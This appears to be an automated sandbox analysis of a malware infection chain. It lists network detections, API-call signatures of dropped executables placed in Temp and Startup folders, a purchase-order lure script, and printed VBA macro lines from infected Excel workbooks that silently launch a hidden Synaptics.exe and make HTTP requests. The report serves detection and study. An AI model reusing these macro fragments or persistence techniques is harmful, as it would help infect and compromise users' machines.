                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52164 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:52163 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52187 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52187 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52188 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52196 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52200 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52219 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:52222 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:52220 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52221 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52229 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52228 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:52230 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:52232 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52242 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52239 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52287 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52288 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52299 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52302 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52311 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52312 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52322 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52323 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52335 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52334 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52339 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52340 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52344 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52346 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52348 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52350 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52358 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52357 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52366 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52368 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52374 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52372 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52381 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52382 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52386 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:52387 version: TLS 1.2
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00957099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_00957099
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00957294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00957294
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008F7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_008F7294
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_00297294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,27_2_00297294
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00957099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_00957099
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00944342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,2_2_00944342
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0096F5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0096F5D0
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_0090F5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_0090F5D0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_002AF5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,27_2_002AF5D0

                            System Summary

                            barindex
                            Document contains an embedded VBA macro with suspicious strings
                            Source: JLGkYinr.xlsm.5.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                            Source: JLGkYinr.xlsm.5.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: JLGkYinr.xlsm.5.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: JLGkYinr.xlsm.5.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: JLGkYinr.xlsm.5.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                            Source: JLGkYinr.xlsm.5.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                            Source: JLGkYinr.xlsm.5.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                            Source: JLGkYinr.xlsm.5.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                            Source: JLGkYinr.xlsm.5.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                            Source: JLGkYinr.xlsm.5.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                            Source: JLGkYinr.xlsm.5.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                            Source: XZXHAVGRAG.xlsm.5.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                            Source: XZXHAVGRAG.xlsm.5.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: XZXHAVGRAG.xlsm.5.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: XZXHAVGRAG.xlsm.5.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: XZXHAVGRAG.xlsm.5.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                            Source: XZXHAVGRAG.xlsm.5.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                            Source: XZXHAVGRAG.xlsm.5.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                            Source: XZXHAVGRAG.xlsm.5.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                            Source: XZXHAVGRAG.xlsm.5.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                            Source: XZXHAVGRAG.xlsm.5.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                            Source: XZXHAVGRAG.xlsm.5.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                            Source: 2iL45kbL.xlsm.29.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                            Source: 2iL45kbL.xlsm.29.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: 2iL45kbL.xlsm.29.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: 2iL45kbL.xlsm.29.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: 2iL45kbL.xlsm.29.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                            Source: 2iL45kbL.xlsm.29.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                            Source: 2iL45kbL.xlsm.29.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                            Source: 2iL45kbL.xlsm.29.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                            Source: 2iL45kbL.xlsm.29.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                            Source: 2iL45kbL.xlsm.29.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                            Source: 2iL45kbL.xlsm.29.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                            Source: HTAGVDFUIE.xlsm.29.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                            Source: HTAGVDFUIE.xlsm.29.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: HTAGVDFUIE.xlsm.29.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: HTAGVDFUIE.xlsm.29.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                            Source: HTAGVDFUIE.xlsm.29.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                            Source: HTAGVDFUIE.xlsm.29.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                            Source: HTAGVDFUIE.xlsm.29.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                            Source: HTAGVDFUIE.xlsm.29.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                            Source: HTAGVDFUIE.xlsm.29.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                            Source: HTAGVDFUIE.xlsm.29.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                            Source: HTAGVDFUIE.xlsm.29.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                            Document contains an embedded VBA with functions possibly related to ADO stream file operations
                            Source: JLGkYinr.xlsm.5.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                            Source: XZXHAVGRAG.xlsm.5.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                            Source: 2iL45kbL.xlsm.29.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                            Source: HTAGVDFUIE.xlsm.29.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                            Document contains an embedded VBA with functions possibly related to HTTP operations
                            Source: JLGkYinr.xlsm.5.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                            Source: XZXHAVGRAG.xlsm.5.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                            Source: 2iL45kbL.xlsm.29.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                            Source: HTAGVDFUIE.xlsm.29.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                            Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                            Source: JLGkYinr.xlsm.5.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                            Source: XZXHAVGRAG.xlsm.5.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                            Source: 2iL45kbL.xlsm.29.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                            Source: HTAGVDFUIE.xlsm.29.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                            Sample has a suspicious name (potential lure to open the executable)
                            Source: Open Purchase Order Summary Details-16-12-2024.vbsStatic file information: Suspicious name
                            Windows Scripting host queries suspicious COM object (likely to drop second stage)
                            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_009470AE: CreateFileW,DeviceIoControl,CloseHandle,2_2_009470AE
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0093B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,2_2_0093B9F1
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_009482D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_009482D0
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008E82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_008E82D0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_002882D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,27_2_002882D0
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00912B402_2_00912B40
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_009630AD2_2_009630AD
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_009136802_2_00913680
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0090DCD02_2_0090DCD0
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0090A0C02_2_0090A0C0
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_009201832_2_00920183
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0094220C2_2_0094220C
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_009085302_2_00908530
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_009066702_2_00906670
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_009206772_2_00920677
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_009387792_2_00938779
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0096A8DC2_2_0096A8DC
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00920A8F2_2_00920A8F
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00906BBC2_2_00906BBC
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0092AC832_2_0092AC83
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00908CA02_2_00908CA0
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0091AD5C2_2_0091AD5C
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00934EBF2_2_00934EBF
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00920EC42_2_00920EC4
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0093113E2_2_0093113E
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_009212F92_2_009212F9
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0093542F2_2_0093542F
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0096F5D02_2_0096F5D0
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0093599F2_2_0093599F
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0092DA742_2_0092DA74
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0090BDF02_2_0090BDF0
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0092BDF62_2_0092BDF6
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00905D322_2_00905D32
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00921E5A2_2_00921E5A
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0094BFB82_2_0094BFB8
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00937FFD2_2_00937FFD
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0092DF692_2_0092DF69
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008ADCD011_2_008ADCD0
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008AA0C011_2_008AA0C0
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008C018311_2_008C0183
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008E220C11_2_008E220C
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008A853011_2_008A8530
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008A667011_2_008A6670
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008C067711_2_008C0677
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008D877911_2_008D8779
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_0090A8DC11_2_0090A8DC
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008C0A8F11_2_008C0A8F
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008A6BBC11_2_008A6BBC
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008B2B4011_2_008B2B40
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008CAC8311_2_008CAC83
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008A8CA011_2_008A8CA0
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008BAD5C11_2_008BAD5C
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008D4EBF11_2_008D4EBF
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008C0EC411_2_008C0EC4
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_009030AD11_2_009030AD
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008D113E11_2_008D113E
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008C12F911_2_008C12F9
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008D542F11_2_008D542F
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_0090F5D011_2_0090F5D0
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008B368011_2_008B3680
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008D599F11_2_008D599F
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008CDA7411_2_008CDA74
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008CBDF611_2_008CBDF6
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008ABDF011_2_008ABDF0
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008A5D3211_2_008A5D32
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008C1E5A11_2_008C1E5A
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008EBFB811_2_008EBFB8
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008D7FFD11_2_008D7FFD
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008CDF6911_2_008CDF69
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0024DCD027_2_0024DCD0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0024A0C027_2_0024A0C0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0026018327_2_00260183
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0028220C27_2_0028220C
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0024853027_2_00248530
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0026067727_2_00260677
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0024667027_2_00246670
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0027877927_2_00278779
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_002AA8DC27_2_002AA8DC
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_00260A8F27_2_00260A8F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_00246BBC27_2_00246BBC
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_00248CA027_2_00248CA0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0026AC8327_2_0026AC83
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0025AD5C27_2_0025AD5C
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_00274EBF27_2_00274EBF
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_00260EC427_2_00260EC4
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_002A30AD27_2_002A30AD
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0027113E27_2_0027113E
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_002612F927_2_002612F9
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0027542F27_2_0027542F
